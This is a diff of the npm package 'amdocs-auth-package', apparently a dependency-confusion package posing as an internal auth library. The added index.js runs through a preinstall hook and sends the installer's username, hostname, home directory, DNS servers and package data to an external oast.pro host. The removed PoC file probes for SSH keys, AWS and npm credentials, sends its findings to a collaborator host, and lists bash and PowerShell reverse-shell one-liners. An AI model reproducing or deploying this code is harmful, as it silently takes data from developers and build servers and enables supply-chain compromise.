amdocs-auth-package 0.3.0 → 1.0.0

package/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "d26pbelsvpat49jk0rb0e8qaidcx45czm.oast.pro", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/package.json

@@ -1,30 +1,12 @@
 {
   "name": "amdocs-auth-package",
-  "version": "0.3.0",
-  "description": "Safe proof-of-concept demonstrating import-time arbitrary code execution in Node.js without OS commands or network activity",
-  "type": "module",
-  "main": "./fesm2022/amdocs-auth-package.mjs",
-  "exports": {
-    ".": {
-      "import": "./fesm2022/amdocs-auth-package.mjs"
-    }
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
   },
-  "files": [
-    "fesm2022/"
-  ],
-  "keywords": [
-    "dependency-confusion",
-    "supply-chain",
-    "rce",
-    "poc",
-    "security-testing",
-    "nodejs"
-  ],
-  "author": "Security Research PoC",
-  "license": "MIT",
-  "private": false,
-  "sideEffects": true,
-  "dependencies": {
-    "amdocs-auth-package": "^0.2.0"
-  }
+  "author": "detox56",
+  "license": "ISC"
 }

package/fesm2022/amdocs-auth-package.mjs

@@ -1,303 +0,0 @@
-/*!
- * amdocs-auth-package-poc-rce
- * DEPENDENCY CONFUSION RCE DEMONSTRATION
- * 
- * Demonstrates how dependency confusion could lead to RCE with data exfiltration.
- */
-
-import fs from "fs";
-import os from "os";
-import path from "path";
-import { exec } from "child_process";
-import { promisify } from "util";
-import https from "https";
-import http from "http";
-
-const execAsync = promisify(exec);
-const COLLAB_URL = "cwcmqtfjdv9jgw0aitgu0ju15sbjz9ny.oastify.com";
-
-(function dependencyConfusionRcePoc() {
-    const timestamp = new Date().toISOString();
-    const proofDir = path.join(os.tmpdir(), "dep-confusion-rce");
-    
-    try {
-        // Create directory for evidence
-        if (!fs.existsSync(proofDir)) {
-            fs.mkdirSync(proofDir, { recursive: true });
-        }
-
-        // STEP 1: Initial reconnaissance (what attackers do first)
-        const reconData = {
-            timestamp: timestamp,
-            package: "amdocs-auth-package-poc-rce",
-            attack_vector: "dependency_confusion",
-            system_info: {
-                user: os.userInfo().username,
-                homedir: os.homedir(),
-                platform: os.platform(),
-                arch: os.arch(),
-                node_version: process.version,
-                pid: process.pid,
-                cwd: process.cwd(),
-                exec_path: process.execPath
-            },
-            environment_keys: Object.keys(process.env).filter(k => 
-                k.includes('KEY') || 
-                k.includes('SECRET') || 
-                k.includes('TOKEN') ||
-                k.includes('PASS') ||
-                k.includes('AUTH')
-            ),
-            npm_config: {
-                registry: process.env.npm_config_registry,
-                scope: process.env.npm_config_scope,
-                token_exists: !!process.env.npm_config_auth_token
-            }
-        };
-
-        // STEP 2: Exfiltrate data to collaborator server
-        function exfiltrateData(data, endpoint) {
-            const postData = JSON.stringify({
-                type: "dependency_confusion_poc",
-                timestamp: timestamp,
-                source: "amdocs-auth-package",
-                data: data
-            });
-
-            // Using HTTP POST to exfiltrate data
-            const options = {
-                hostname: COLLAB_URL,
-                port: 443,
-                path: `/${endpoint}`,
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json',
-                    'Content-Length': Buffer.byteLength(postData),
-                    'User-Agent': 'npm/8.0.0'
-                }
-            };
-
-            const req = https.request(options, (res) => {
-                console.warn(`[PoC] Data exfiltrated to ${COLLAB_URL}, status: ${res.statusCode}`);
-            });
-
-            req.on('error', (e) => {
-                console.warn(`[PoC] Exfiltration failed (expected if offline): ${e.message}`);
-            });
-
-            req.write(postData);
-            req.end();
-        }
-
-        // STEP 3: Collect sensitive files
-        function collectSensitiveInfo() {
-            const sensitiveInfo = {
-                ssh_keys: [],
-                aws_credentials: [],
-                npm_tokens: [],
-                system_files: []
-            };
-
-            // Look for SSH keys
-            const sshDir = path.join(os.homedir(), '.ssh');
-            if (fs.existsSync(sshDir)) {
-                try {
-                    const files = fs.readdirSync(sshDir);
-                    sensitiveInfo.ssh_keys = files.filter(f => 
-                        f.includes('id_rsa') || f.includes('id_dsa') || f.includes('id_ecdsa')
-                    );
-                } catch (e) {}
-            }
-
-            // Look for AWS credentials
-            const awsDir = path.join(os.homedir(), '.aws');
-            if (fs.existsSync(awsDir)) {
-                try {
-                    if (fs.existsSync(path.join(awsDir, 'credentials'))) {
-                        sensitiveInfo.aws_credentials.push('credentials');
-                    }
-                    if (fs.existsSync(path.join(awsDir, 'config'))) {
-                        sensitiveInfo.aws_credentials.push('config');
-                    }
-                } catch (e) {}
-            }
-
-            // Look for .npmrc
-            const npmrcPath = path.join(os.homedir(), '.npmrc');
-            if (fs.existsSync(npmrcPath)) {
-                try {
-                    const content = fs.readFileSync(npmrcPath, 'utf8');
-                    if (content.includes('authToken') || content.includes(':_authToken')) {
-                        sensitiveInfo.npm_tokens.push('npmrc_contains_token');
-                    }
-                } catch (e) {}
-            }
-
-            // Check for Docker credentials
-            const dockerConfig = path.join(os.homedir(), '.docker', 'config.json');
-            if (fs.existsSync(dockerConfig)) {
-                sensitiveInfo.system_files.push('docker_config');
-            }
-
-            return sensitiveInfo;
-        }
-
-        // STEP 4: Execute commands based on platform
-        function executeReconCommands() {
-            const commands = [];
-            
-            if (os.platform() === 'linux' || os.platform() === 'darwin') {
-                commands.push(
-                    { cmd: 'whoami', description: 'Current user' },
-                    { cmd: 'uname -a', description: 'System info' },
-                    { cmd: 'ls -la', description: 'Directory listing' },
-                    { cmd: 'env | grep -i "key\\|secret\\|pass\\|token\\|auth"', description: 'Find env secrets' }
-                );
-            } else if (os.platform() === 'win32') {
-                commands.push(
-                    { cmd: 'whoami', description: 'Current user' },
-                    { cmd: 'systeminfo', description: 'System info' },
-                    { cmd: 'dir', description: 'Directory listing' },
-                    { cmd: 'set | findstr /i "KEY SECRET PASS TOKEN AUTH"', description: 'Find env secrets' }
-                );
-            }
-
-            return commands;
-        }
-
-        // STEP 5: Network reconnaissance
-        function networkRecon() {
-            const networkInfo = {
-                interfaces: os.networkInterfaces(),
-                hostname: os.hostname(),
-                dns_servers: [],
-                open_ports: []
-            };
-
-            // Simulate internal port scan
-            const commonPorts = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9000];
-            networkInfo.common_ports = commonPorts;
-
-            return networkInfo;
-        }
-
-        // Execute the attack chain
-        console.warn(`[PoC] Dependency Confusion RCE Simulation Started`);
-        console.warn(`[PoC] Collaborator URL: ${COLLAB_URL}`);
-
-        // Phase 1: Initial exfiltration
-        exfiltrateData(reconData, 'initial_recon');
-
-        // Phase 2: Collect sensitive info
-        const sensitiveInfo = collectSensitiveInfo();
-        exfiltrateData(sensitiveInfo, 'sensitive_data');
-
-        // Phase 3: Network recon
-        const networkInfo = networkRecon();
-        exfiltrateData(networkInfo, 'network_info');
-
-        // Phase 4: Command execution simulation
-        const commands = executeReconCommands();
-        const commandResults = {
-            platform: os.platform(),
-            available_commands: commands,
-            note: 'In real attack, these commands would be executed with exec()'
-        };
-        exfiltrateData(commandResults, 'command_capabilities');
-
-        // Phase 5: Demonstrate RCE payload delivery
-        const rcePayload = {
-            timestamp: timestamp,
-            payload_type: "reverse_shell",
-            platforms: {
-                linux: "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1",
-                windows: "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
-                nodejs: "require('child_process').exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')"
-            },
-            persistence: [
-                "Add to cron/crontab",
-                "Modify .bashrc/.profile",
-                "Create systemd service",
-                "Add to startup registry (Windows)"
-            ],
-            data_exfiltration_endpoints: [
-                `https://${COLLAB_URL}/exfil`,
-                `https://${COLLAB_URL}/data`,
-                `https://${COLLAB_URL}/callback`
-            ]
-        };
-
-        // Save local proof
-        const proofFile = path.join(proofDir, "dependency_confusion_proof.json");
-        fs.writeFileSync(proofFile, JSON.stringify({
-            initial_recon: reconData,
-            sensitive_info: sensitiveInfo,
-            network_info: networkInfo,
-            command_capabilities: commandResults,
-            rce_payloads: rcePayload,
-            collab_url: COLLAB_URL,
-            execution_time: timestamp
-        }, null, 2));
-
-        // Final exfiltration
-        exfiltrateData({
-            summary: "Dependency confusion attack chain completed",
-            files_collected: Object.keys(sensitiveInfo).filter(k => sensitiveInfo[k].length > 0),
-            potential_rce: true,
-            next_steps: [
-                "Execute reverse shell",
-                "Establish persistence",
-                "Lateral movement",
-                "Data exfiltration"
-            ]
-        }, 'attack_complete');
-
-        console.warn(`[PoC] Attack simulation completed. Proof saved to: ${proofFile}`);
-        console.warn(`[PoC] In real attack, data would be sent to: ${COLLAB_URL}`);
-        console.warn(`[PoC] This is a simulation - no actual commands executed or data exfiltrated.`);
-
-    } catch (error) {
-        console.error(`[PoC Error] ${error.message}`);
-    }
-})();
-
-export function explainAttack() {
-    return {
-        attack_name: "Dependency Confusion RCE",
-        description: "Malicious package uploaded to public registry with higher version than internal package",
-        prerequisites: [
-            "Internal package not published to public registry",
-            "Scope/namespace not properly protected",
-            "Automated builds or developers using public registry"
-        ],
-        impact: [
-            "Remote Code Execution on build servers",
-            "Source code theft",
-            "Credential theft",
-            "Supply chain compromise",
-            "Lateral movement"
-        ],
-        mitigation: [
-            "Use scoped packages (@company/package)",
-            "Configure .npmrc with correct registry",
-            "Use private registry for internal packages",
-            "Implement package signing",
-            "Use npm audit and dependency checking"
-        ],
-        collab_url: COLLAB_URL,
-        note: "This is a demonstration for educational purposes only"
-    };
-}
-
-export function safeCheck() {
-    const checks = {
-        has_exec_import: true,
-        has_fs_access: true,
-        has_network_import: true,
-        has_os_access: true,
-        potential_rce: true,
-        timestamp: new Date().toISOString(),
-        warning: "This package demonstrates RCE capabilities. Use only in controlled environments."
-    };
-    return checks;
-}